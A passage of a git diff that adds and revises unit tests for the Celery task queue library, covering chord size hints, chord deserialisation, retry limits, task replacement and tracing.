+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We see applies for all of the header great-grandchildren because the
+ # tasks are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count * ggchild_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the deeply encapsulated chords' header tasks, as well as for each
+ # child chord. This means we have `child_count` interleaved calls to
+ # set chord sizes of 1 and `ggchild_count`.
+ mock_set_chord_size.assert_has_calls(
+ (call(ANY, 1), call(ANY, ggchild_count), ) * child_count,
+ )
+
+ def test_apply_contains_chords_containing_empty_chord(self):
+ gchild_sig = chord(tuple(), self.add.si(0, 0))
+ child_count = 24
+ child_chord = chord((gchild_sig, ), self.add.si(0, 0))
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the encapsulated chains - in this case 1 for each child chord
+ mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count)
+
class test_chord(CanvasCase):
+ def test__get_app_does_not_exhaust_generator(self):
+ def build_generator():
+ yield self.add.s(1, 1)
+ self.second_item_returned = True
+ yield self.add.s(2, 2)
+ raise pytest.fail("This should never be reached")
+
+ self.second_item_returned = False
+ c = chord(build_generator(), self.add.s(3))
+ c.app
+ # The second task gets returned due to lookahead in `regen()`
+ assert self.second_item_returned
+ # Access it again to make sure the generator is not further evaluated
+ c.app
+
def test_reverse(self):
x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4))
assert isinstance(signature(x), chord)
@@ -743,12 +1035,179 @@ def test_app_fallback_to_current(self):
x = chord([t1], body=t1)
assert x.app is current_app
- def test_chord_size_with_groups(self):
- x = chord([
- self.add.s(2, 2) | group([self.add.si(2, 2), self.add.si(2, 2)]),
- self.add.s(2, 2) | group([self.add.si(2, 2), self.add.si(2, 2)]),
- ], body=self.add.si(2, 2))
- assert x.__length_hint__() == 4
+ def test_chord_size_simple(self):
+ sig = chord(self.add.s())
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_with_body(self):
+ sig = chord(self.add.s(), self.add.s())
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_explicit_group_single(self):
+ sig = chord(group(self.add.s()))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_explicit_group_many(self):
+ sig = chord(group([self.add.s()] * 42))
+ assert sig.__length_hint__() == 42
+
+ def test_chord_size_implicit_group_single(self):
+ sig = chord([self.add.s()])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_implicit_group_many(self):
+ sig = chord([self.add.s()] * 42)
+ assert sig.__length_hint__() == 42
+
+ def test_chord_size_chain_single(self):
+ sig = chord(chain(self.add.s()))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_chain_many(self):
+ # Chains get flattened into the encapsulating chord so even though the
+        # chain would only count for 1, its tasks get pulled into the chord's
+        # header and are counted as a bunch of simple signature objects
+ sig = chord(chain([self.add.s()] * 42))
+ assert sig.__length_hint__() == 42
+
+ def test_chord_size_nested_chain_chain_single(self):
+ sig = chord(chain(chain(self.add.s())))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chain_chain_many(self):
+ # The outer chain will be pulled up into the chord but the lower one
+ # remains and will only count as a single final element
+ sig = chord(chain(chain([self.add.s()] * 42)))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_implicit_chain_single(self):
+ sig = chord([self.add.s()])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_implicit_chain_many(self):
+ # This isn't a chain object so the `tasks` attribute can't be lifted
+        # into the chord - this isn't actually valid and would blow up if we
+        # tried to run it, but it sanity checks our recursion
+ sig = chord([[self.add.s()] * 42])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_implicit_chain_chain_single(self):
+ sig = chord([chain(self.add.s())])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_implicit_chain_chain_many(self):
+ sig = chord([chain([self.add.s()] * 42)])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chord_body_simple(self):
+ sig = chord(chord(tuple(), self.add.s()))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chord_body_implicit_group_single(self):
+ sig = chord(chord(tuple(), [self.add.s()]))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chord_body_implicit_group_many(self):
+ sig = chord(chord(tuple(), [self.add.s()] * 42))
+ assert sig.__length_hint__() == 42
+
+ # Nested groups in a chain only affect the chord size if they are the last
+ # element in the chain - in that case each group element is counted
+ def test_chord_size_nested_group_chain_group_head_single(self):
+ x = chord(
+ group(
+ [group(self.add.s()) | self.add.s()] * 42
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_group_chain_group_head_many(self):
+ x = chord(
+ group(
+ [group([self.add.s()] * 4) | self.add.s()] * 2
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 2
+
+ def test_chord_size_nested_group_chain_group_mid_single(self):
+ x = chord(
+ group(
+ [self.add.s() | group(self.add.s()) | self.add.s()] * 42
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_group_chain_group_mid_many(self):
+ x = chord(
+ group(
+ [self.add.s() | group([self.add.s()] * 4) | self.add.s()] * 2
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 2
+
+ def test_chord_size_nested_group_chain_group_tail_single(self):
+ x = chord(
+ group(
+ [self.add.s() | group(self.add.s())] * 42
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_group_chain_group_tail_many(self):
+ x = chord(
+ group(
+ [self.add.s() | group([self.add.s()] * 4)] * 2
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 4 * 2
+
+ def test_chord_size_nested_implicit_group_chain_group_tail_single(self):
+ x = chord(
+ [self.add.s() | group(self.add.s())] * 42,
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_implicit_group_chain_group_tail_many(self):
+ x = chord(
+ [self.add.s() | group([self.add.s()] * 4)] * 2,
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 4 * 2
+
+ def test_chord_size_deserialized_element_single(self):
+ child_sig = self.add.s()
+ deserialized_child_sig = json.loads(json.dumps(child_sig))
+ # We have to break in to be sure that a child remains as a `dict` so we
+ # can confirm that the length hint will instantiate a `Signature`
+ # object and then descend as expected
+ chord_sig = chord(tuple())
+ chord_sig.tasks = [deserialized_child_sig]
+ with patch(
+ "celery.canvas.Signature.from_dict", return_value=child_sig
+ ) as mock_from_dict:
+ assert chord_sig.__length_hint__() == 1
+ mock_from_dict.assert_called_once_with(deserialized_child_sig)
+
+ def test_chord_size_deserialized_element_many(self):
+ child_sig = self.add.s()
+ deserialized_child_sig = json.loads(json.dumps(child_sig))
+ # We have to break in to be sure that a child remains as a `dict` so we
+ # can confirm that the length hint will instantiate a `Signature`
+ # object and then descend as expected
+ chord_sig = chord(tuple())
+ chord_sig.tasks = [deserialized_child_sig] * 42
+ with patch(
+ "celery.canvas.Signature.from_dict", return_value=child_sig
+ ) as mock_from_dict:
+ assert chord_sig.__length_hint__() == 42
+ mock_from_dict.assert_has_calls([call(deserialized_child_sig)] * 42)
def test_set_immutable(self):
x = chord([Mock(name='t1'), Mock(name='t2')], app=self.app)
@@ -773,22 +1232,35 @@ def test_repr(self):
x.kwargs['body'] = None
assert 'without body' in repr(x)
- def test_freeze_tasks_body_is_group(self):
- # Confirm that `group index` is passed from a chord to elements of its
- # body when the chord itself is encapsulated in a group
+ def test_freeze_tasks_body_is_group(self, subtests):
+ # Confirm that `group index` values counting up from 0 are set for
+ # elements of a chord's body when the chord is encapsulated in a group
body_elem = self.add.s()
- chord_body = group([body_elem])
+ chord_body = group([body_elem] * 42)
chord_obj = chord(self.add.s(), body=chord_body)
top_group = group([chord_obj])
# We expect the body to be the signature we passed in before we freeze
- (embedded_body_elem, ) = chord_obj.body.tasks
- assert embedded_body_elem is body_elem
- assert embedded_body_elem.options == dict()
- # When we freeze the chord, its body will be clones and options set
+ with subtests.test(msg="Validate body tasks are retained"):
+ assert all(
+ embedded_body_elem is body_elem
+ for embedded_body_elem in chord_obj.body.tasks
+ )
+ # We also expect the body to have no initial options - since all of the
+ # embedded body elements are confirmed to be `body_elem` this is valid
+ assert body_elem.options == {}
+ # When we freeze the chord, its body will be cloned and options set
top_group.freeze()
- (embedded_body_elem, ) = chord_obj.body.tasks
- assert embedded_body_elem is not body_elem
- assert embedded_body_elem.options["group_index"] == 0 # 0th task
+ with subtests.test(
+ msg="Validate body group indices count from 0 after freezing"
+ ):
+ assert all(
+ embedded_body_elem is not body_elem
+ for embedded_body_elem in chord_obj.body.tasks
+ )
+ assert all(
+ embedded_body_elem.options["group_index"] == i
+ for i, embedded_body_elem in enumerate(chord_obj.body.tasks)
+ )
def test_freeze_tasks_is_not_group(self):
x = chord([self.add.s(2, 2)], body=self.add.s(), app=self.app)
@@ -818,6 +1290,117 @@ def chord_add():
_state.task_join_will_block = fixture_task_join_will_block
result.task_join_will_block = fixture_task_join_will_block
+ def test_from_dict(self):
+ header = self.add.s(1, 2)
+ original_chord = chord(header=header)
+ rebuilt_chord = chord.from_dict(dict(original_chord))
+ assert isinstance(rebuilt_chord, chord)
+
+ def test_from_dict_with_body(self):
+ header = body = self.add.s(1, 2)
+ original_chord = chord(header=header, body=body)
+ rebuilt_chord = chord.from_dict(dict(original_chord))
+ assert isinstance(rebuilt_chord, chord)
+
+ def test_from_dict_deep_deserialize(self, subtests):
+ header = body = self.add.s(1, 2)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ with subtests.test(msg="Validate chord header tasks is deserialized"):
+ assert all(
+ isinstance(child_task, Signature)
+ for child_task in deserialized_chord.tasks
+ )
+ with subtests.test(msg="Verify chord body is deserialized"):
+ assert isinstance(deserialized_chord.body, Signature)
+
+ def test_from_dict_deep_deserialize_group(self, subtests):
+ header = body = group([self.add.s(1, 2)] * 42)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ # A header which is a group gets unpacked into the chord's `tasks`
+ with subtests.test(
+ msg="Validate chord header tasks are deserialized and unpacked"
+ ):
+ assert all(
+ isinstance(child_task, Signature)
+ and not isinstance(child_task, group)
+ for child_task in deserialized_chord.tasks
+ )
+ # A body which is a group remains as we passed it in
+ with subtests.test(
+ msg="Validate chord body is deserialized and not unpacked"
+ ):
+ assert isinstance(deserialized_chord.body, group)
+ assert all(
+ isinstance(body_child_task, Signature)
+ for body_child_task in deserialized_chord.body.tasks
+ )
+
+ def test_from_dict_deeper_deserialize_group(self, subtests):
+ inner_group = group([self.add.s(1, 2)] * 42)
+ header = body = group([inner_group] * 42)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ # A header which is a group gets unpacked into the chord's `tasks`
+ with subtests.test(
+ msg="Validate chord header tasks are deserialized and unpacked"
+ ):
+ assert all(
+ isinstance(child_task, group)
+ for child_task in deserialized_chord.tasks
+ )
+ assert all(
+ isinstance(grandchild_task, Signature)
+ for child_task in deserialized_chord.tasks
+ for grandchild_task in child_task.tasks
+ )
+ # A body which is a group remains as we passed it in
+ with subtests.test(
+ msg="Validate chord body is deserialized and not unpacked"
+ ):
+ assert isinstance(deserialized_chord.body, group)
+ assert all(
+ isinstance(body_child_task, group)
+ for body_child_task in deserialized_chord.body.tasks
+ )
+ assert all(
+ isinstance(body_grandchild_task, Signature)
+ for body_child_task in deserialized_chord.body.tasks
+ for body_grandchild_task in body_child_task.tasks
+ )
+
+ def test_from_dict_deep_deserialize_chain(self, subtests):
+ header = body = chain([self.add.s(1, 2)] * 42)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ # A header which is a chain gets unpacked into the chord's `tasks`
+ with subtests.test(
+ msg="Validate chord header tasks are deserialized and unpacked"
+ ):
+ assert all(
+ isinstance(child_task, Signature)
+ and not isinstance(child_task, chain)
+ for child_task in deserialized_chord.tasks
+ )
+ # A body which is a chain gets mutated into the hidden `_chain` class
+ with subtests.test(
+ msg="Validate chord body is deserialized and not unpacked"
+ ):
+ assert isinstance(deserialized_chord.body, _chain)
+
class test_maybe_signature(CanvasCase):
diff --git a/t/unit/tasks/test_chord.py b/t/unit/tasks/test_chord.py
index e25e2ccc229..af4fdee4627 100644
--- a/t/unit/tasks/test_chord.py
+++ b/t/unit/tasks/test_chord.py
@@ -1,5 +1,5 @@
from contextlib import contextmanager
-from unittest.mock import Mock, patch, sentinel
+from unittest.mock import Mock, PropertyMock, patch, sentinel
import pytest
@@ -279,6 +279,24 @@ def test_apply(self):
finally:
chord.run = prev
+ def test_init(self):
+ from celery import chord
+ from celery.utils.serialization import pickle
+
+ @self.app.task(shared=False)
+ def addX(x, y):
+ return x + y
+
+ @self.app.task(shared=False)
+ def sumX(n):
+ return sum(n)
+
+ x = chord(addX.s(i, i) for i in range(10))
+ # kwargs used to nest and recurse in serialization/deserialization
+ # (#6810)
+ assert x.kwargs['kwargs'] == {}
+ assert pickle.loads(pickle.dumps(x)).kwargs == x.kwargs
+
class test_add_to_chord:
@@ -294,9 +312,8 @@ def adds(self, sig, lazy=False):
return self.add_to_chord(sig, lazy)
self.adds = adds
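+ # Patch the `backend` property on the Celery class instead of assigning a
+ # mock to the app instance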
+ @patch('celery.Celery.backend', new=PropertyMock(name='backend'))
def test_add_to_chord(self):
- self.app.backend = Mock(name='backend')
-
sig = self.add.s(2, 2)
sig.delay = Mock(name='sig.delay')
self.adds.request.group = uuid()
@@ -333,8 +350,8 @@ def test_add_to_chord(self):
class test_Chord_task(ChordCase):
+ @patch('celery.Celery.backend', new=PropertyMock(name='backend'))
def test_run(self):
- self.app.backend = Mock()
self.app.backend.cleanup = Mock()
self.app.backend.cleanup.__name__ = 'cleanup'
Chord = self.app.tasks['celery.chord']
@@ -343,3 +360,13 @@ def test_run(self):
Chord(group(self.add.signature((i, i)) for i in range(5)), body)
Chord([self.add.signature((j, j)) for j in range(5)], body)
assert self.app.backend.apply_chord.call_count == 2
+
+ @patch('celery.Celery.backend', new=PropertyMock(name='backend'))
+ def test_run__chord_size_set(self):
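+ # Applying a chord should record the size of its header with the result
+ # backend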
+ Chord = self.app.tasks['celery.chord']
+ body = self.add.signature()
+ group_size = 4
+ group1 = group(self.add.signature((i, i)) for i in range(group_size))
+ result = Chord(group1, body)
+
+ self.app.backend.set_chord_size.assert_called_once_with(result.parent.id, group_size)
diff --git a/t/unit/tasks/test_result.py b/t/unit/tasks/test_result.py
index e3d06db0f30..4e0975bbc75 100644
--- a/t/unit/tasks/test_result.py
+++ b/t/unit/tasks/test_result.py
@@ -59,6 +59,9 @@ def add_pending_result(self, *args, **kwargs):
def wait_for_pending(self, *args, **kwargs):
return True
+ def remove_pending_result(self, *args, **kwargs):
+ return True
+
class test_AsyncResult:
@@ -708,19 +711,19 @@ def test_get_nested_without_native_join(self):
]),
]),
])
- ts.app.backend = backend
- vals = ts.get()
- assert vals == [
- '1.1',
- [
- '2.1',
+ with patch('celery.Celery.backend', new=backend):
+ vals = ts.get()
+ assert vals == [
+ '1.1',
[
- '3.1',
- '3.2',
- ]
- ],
- ]
+ '2.1',
+ [
+ '3.1',
+ '3.2',
+ ]
+ ],
+ ]
def test_getitem(self):
subs = [MockAsyncResultSuccess(uuid(), app=self.app),
@@ -771,15 +774,16 @@ def test_join_native(self):
results = [self.app.AsyncResult(uuid(), backend=backend)
for i in range(10)]
ts = self.app.GroupResult(uuid(), results)
- ts.app.backend = backend
- backend.ids = [result.id for result in results]
- res = ts.join_native()
- assert res == list(range(10))
- callback = Mock(name='callback')
- assert not ts.join_native(callback=callback)
- callback.assert_has_calls([
- call(r.id, i) for i, r in enumerate(ts.results)
- ])
+
+ with patch('celery.Celery.backend', new=backend):
+ backend.ids = [result.id for result in results]
+ res = ts.join_native()
+ assert res == list(range(10))
+ callback = Mock(name='callback')
+ assert not ts.join_native(callback=callback)
+ callback.assert_has_calls([
+ call(r.id, i) for i, r in enumerate(ts.results)
+ ])
def test_join_native_raises(self):
ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])
@@ -813,9 +817,9 @@ def test_iter_native(self):
results = [self.app.AsyncResult(uuid(), backend=backend)
for i in range(10)]
ts = self.app.GroupResult(uuid(), results)
- ts.app.backend = backend
- backend.ids = [result.id for result in results]
- assert len(list(ts.iter_native())) == 10
+ with patch('celery.Celery.backend', new=backend):
+ backend.ids = [result.id for result in results]
+ assert len(list(ts.iter_native())) == 10
def test_join_timeout(self):
ar = MockAsyncResultSuccess(uuid(), app=self.app)
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index 154ee0295cb..89689914f26 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -1,15 +1,15 @@
import socket
import tempfile
from datetime import datetime, timedelta
-from unittest.mock import ANY, MagicMock, Mock, patch
+from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import pytest
-from case import ContextMock
from kombu import Queue
from kombu.exceptions import EncodeError
from celery import Task, group, uuid
from celery.app.task import _reprtask
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import Ignore, ImproperlyConfigured, Retry
from celery.result import AsyncResult, EagerResult
from celery.utils.time import parse_iso8601
@@ -144,6 +144,27 @@ def retry_task_auto_retry_exception_with_new_args(self, ret=None, place_holder=N
self.retry_task_auto_retry_exception_with_new_args = retry_task_auto_retry_exception_with_new_args
+ @self.app.task(bind=True, max_retries=10, iterations=0, shared=False,
+ autoretry_for=(Exception,))
+ def retry_task_max_retries_override(self, **kwargs):
+ # Test for #6436
+ self.iterations += 1
+ if self.iterations == 3:
+ # Force a final failure here by disabling further retries
+ self.retry(exc=MyCustomException, max_retries=0)
+ self.retry(exc=MyCustomException)
+
+ self.retry_task_max_retries_override = retry_task_max_retries_override
+
+ @self.app.task(bind=True, max_retries=0, iterations=0, shared=False,
+ autoretry_for=(Exception,))
+ def retry_task_explicit_exception(self, **kwargs):
+ # Test for #6436
+ self.iterations += 1
+ raise MyCustomException()
+
+ self.retry_task_explicit_exception = retry_task_explicit_exception
+
@self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
def retry_task_raise_without_throw(self, **kwargs):
self.iterations += 1
@@ -401,6 +422,12 @@ def test_signature_from_request__delivery_info(self):
assert sig.options['exchange'] == 'testex'
assert sig.options['routing_key'] == 'testrk'
+ def test_signature_from_request__shadow_name(self):
+ self.retry_task.push_request()
+ self.retry_task.request.shadow = 'test'
+ sig = self.retry_task.signature_from_request()
+ assert sig.options['shadow'] == 'test'
+
def test_retry_kwargs_can_be_empty(self):
self.retry_task_mockapply.push_request()
try:
@@ -432,6 +459,22 @@ def test_eager_retry_with_new_params(self):
def test_eager_retry_with_autoretry_for_exception(self):
assert self.retry_task_auto_retry_exception_with_new_args.si(place_holder="test").apply().get() == "test"
+ def test_retry_task_max_retries_override(self):
+ self.retry_task_max_retries_override.max_retries = 10
+ self.retry_task_max_retries_override.iterations = 0
+ result = self.retry_task_max_retries_override.apply()
+ with pytest.raises(MyCustomException):
+ result.get()
+ assert self.retry_task_max_retries_override.iterations == 3
+
+ def test_retry_task_explicit_exception(self):
+ self.retry_task_explicit_exception.max_retries = 0
+ self.retry_task_explicit_exception.iterations = 0
+ result = self.retry_task_explicit_exception.apply()
+ with pytest.raises(MyCustomException):
+ result.get()
+ assert self.retry_task_explicit_exception.iterations == 1
+
def test_retry_eager_should_return_value(self):
self.retry_task.max_retries = 3
self.retry_task.iterations = 0
@@ -529,7 +572,7 @@ def test_autoretry_backoff(self, randrange):
assert task.iterations == 4
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8]
@@ -544,7 +587,7 @@ def test_autoretry_backoff_jitter(self, randrange):
assert task.iterations == 4
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [0, 1, 3, 7]
@@ -576,7 +619,7 @@ def test_retry_backoff_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 32]
@@ -595,7 +638,7 @@ def test_retry_backoff_max_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 32]
@@ -607,7 +650,7 @@ def test_override_retry_backoff_max_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 16]
@@ -619,7 +662,7 @@ def test_retry_backoff_jitter_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 32]
@@ -632,7 +675,7 @@ def test_override_backoff_jitter_from_base(self, randrange):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [0, 1, 3, 7, 15, 31]
@@ -887,7 +930,7 @@ def test_regular_task(self):
consumer, sresult, self.mytask.name, name='Elaine M. Benes',
)
- # With ETA.
+ # With ETA, absolute expires.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'},
eta=self.now() + timedelta(days=1),
@@ -898,6 +941,39 @@ def test_regular_task(self):
name='George Costanza', test_eta=True, test_expires=True,
)
+ # With ETA, absolute expires without timezone.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Constanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=(self.now() + timedelta(hours=2)).replace(tzinfo=None),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
+ # With ETA, absolute expires in the past.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=self.now() - timedelta(days=2),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
+ # With ETA, relative expires.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=2 * 24 * 60 * 60,
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
# With countdown.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'}, countdown=10, expires=12,
@@ -949,10 +1025,17 @@ def test_send_event(self):
retry=True, retry_policy=self.app.conf.task_publish_retry_policy)
def test_replace(self):
- sig1 = Mock(name='sig1')
+ sig1 = MagicMock(name='sig1')
sig1.options = {}
+ self.mytask.request.id = sentinel.request_id
with pytest.raises(Ignore):
self.mytask.replace(sig1)
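+ # The replacement signature should be frozen with the original request id
+ # and inherit the chord/group context via `set()`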
+ sig1.freeze.assert_called_once_with(self.mytask.request.id)
+ sig1.set.assert_called_once_with(replaced_task_nesting=1,
+ chord=ANY,
+ group_id=ANY,
+ group_index=ANY,
+ root_id=ANY)
def test_replace_with_chord(self):
sig1 = Mock(name='sig1')
@@ -960,7 +1043,6 @@ def test_replace_with_chord(self):
with pytest.raises(ImproperlyConfigured):
self.mytask.replace(sig1)
- @pytest.mark.usefixtures('depends_on_current_app')
def test_replace_callback(self):
c = group([self.mytask.s()], app=self.app)
c.freeze = Mock(name='freeze')
@@ -968,29 +1050,23 @@ def test_replace_callback(self):
self.mytask.request.id = 'id'
self.mytask.request.group = 'group'
self.mytask.request.root_id = 'root_id'
- self.mytask.request.callbacks = 'callbacks'
- self.mytask.request.errbacks = 'errbacks'
-
- class JsonMagicMock(MagicMock):
- parent = None
-
- def __json__(self):
- return 'whatever'
-
- def reprcall(self, *args, **kwargs):
- return 'whatever2'
-
- mocked_signature = JsonMagicMock(name='s')
- accumulate_mock = JsonMagicMock(name='accumulate', s=mocked_signature)
- self.mytask.app.tasks['celery.accumulate'] = accumulate_mock
-
- try:
- self.mytask.replace(c)
- except Ignore:
- mocked_signature.return_value.set.assert_called_with(
- link='callbacks',
- link_error='errbacks',
- )
+ self.mytask.request.callbacks = callbacks = 'callbacks'
+ self.mytask.request.errbacks = errbacks = 'errbacks'
+
+ # Replacement groups get uplifted to chords so that we can accumulate
+ # the results and link call/errbacks - patch the appropriate `chord`
+ # methods so we can validate this behaviour
+ with patch(
+ "celery.canvas.chord.link"
+ ) as mock_chord_link, patch(
+ "celery.canvas.chord.link_error"
+ ) as mock_chord_link_error:
+ with pytest.raises(Ignore):
+ self.mytask.replace(c)
+ # Confirm that the call/errbacks on the original signature are linked
+ # to the replacement signature as expected
+ mock_chord_link.assert_called_once_with(callbacks)
+ mock_chord_link_error.assert_called_once_with(errbacks)
def test_replace_group(self):
c = group([self.mytask.s()], app=self.app)
@@ -1245,6 +1321,29 @@ def test_apply(self):
with pytest.raises(KeyError):
f.get()
+ def test_apply_simulates_delivery_info(self):
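+ # `apply()` should fake the delivery_info a broker delivery would
+ # provide, plus an `is_eager` flag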
+ task_to_apply = self.task_check_request_context
+ with patch.object(
+ task_to_apply.request_stack, "push",
+ wraps=task_to_apply.request_stack.push,
+ ) as mock_push:
+ task_to_apply.apply(
+ priority=4,
+ routing_key='myroutingkey',
+ exchange='myexchange',
+ )
+
+ mock_push.assert_called_once()
+
+ request = mock_push.call_args[0][0]
+
+ assert request.delivery_info == {
+ 'is_eager': True,
+ 'exchange': 'myexchange',
+ 'routing_key': 'myroutingkey',
+ 'priority': 4,
+ }
+
class test_apply_async(TasksCase):
def common_send_task_arguments(self):
diff --git a/t/unit/tasks/test_trace.py b/t/unit/tasks/test_trace.py
index e78b6aa4148..55c106894bd 100644
--- a/t/unit/tasks/test_trace.py
+++ b/t/unit/tasks/test_trace.py
@@ -1,4 +1,5 @@
-from unittest.mock import Mock, patch
+from unittest.mock import ANY, Mock, PropertyMock, patch
+from uuid import uuid4
import pytest
from billiard.einfo import ExceptionInfo
@@ -6,23 +7,27 @@
from celery import group, signals, states, uuid
from celery.app.task import Context
-from celery.app.trace import (TraceInfo, _fast_trace_task, _trace_task_ret,
- build_tracer, get_log_policy, get_task_name,
+from celery.app.trace import (TraceInfo, build_tracer, fast_trace_task,
+ get_log_policy, get_task_name,
log_policy_expected, log_policy_ignore,
log_policy_internal, log_policy_reject,
log_policy_unexpected,
reset_worker_optimizations,
setup_worker_optimizations, trace_task,
- traceback_clear)
+ trace_task_ret, traceback_clear)
from celery.backends.base import BaseDictBackend
-from celery.exceptions import Ignore, Reject, Retry
+from celery.backends.cache import CacheBackend
+from celery.exceptions import BackendGetMetaError, Ignore, Reject, Retry
+from celery.states import PENDING
+from celery.worker.state import successful_requests
def trace(
- app, task, args=(), kwargs={}, propagate=False, eager=True, request=None, **opts
+ app, task, args=(), kwargs={}, propagate=False,
+ eager=True, request=None, task_id='id-1', **opts
):
t = build_tracer(task.name, task, eager=eager, propagate=propagate, app=app, **opts)
- ret = t('id-1', args, kwargs, request)
+ ret = t(task_id, args, kwargs, request)
return ret.retval, ret.info
@@ -56,6 +61,14 @@ def test_trace_successful(self):
assert info is None
assert retval == 4
+ def test_trace_before_start(self):
+ @self.app.task(shared=False, before_start=Mock())
+ def add_with_before_start(x, y):
+ return x + y
+
+ self.trace(add_with_before_start, (2, 2), {})
+ add_with_before_start.before_start.assert_called()
+
def test_trace_on_success(self):
@self.app.task(shared=False, on_success=Mock())
def add_with_success(x, y):
@@ -148,6 +161,75 @@ def add(x, y):
with pytest.raises(MemoryError):
self.trace(add, (2, 2), {}, eager=False)
+ def test_eager_task_does_not_store_result_even_if_not_ignore_result(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ add.backend = Mock(name='backend')
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.mark_as_done.assert_called_once_with(
+ 'id-1', # task_id
+ 4, # result
+ ANY, # request
